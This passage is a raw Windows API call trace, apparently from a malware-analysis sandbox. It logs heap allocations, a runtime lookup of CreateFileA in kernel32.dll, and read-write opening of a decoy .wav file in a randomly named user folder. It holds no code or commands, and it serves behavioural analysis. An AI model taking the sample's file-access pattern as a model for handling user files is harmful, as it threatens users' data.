(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.601] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fe8 [0182.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0182.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.602] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0182.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0182.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0182.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.603] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0182.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0182.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0182.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x56) returned 0x8c4a48 [0182.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", cchWideChar=86, lpMultiByteStr=0x8c4a48, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpUsedDefaultChar=0x0) returned 86 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.605] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0182.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xac) returned 0x8e6f00 [0182.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x8e6f00, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav") returned 86 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.611] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.612] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0182.613] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.614] RtlAllocateHeap 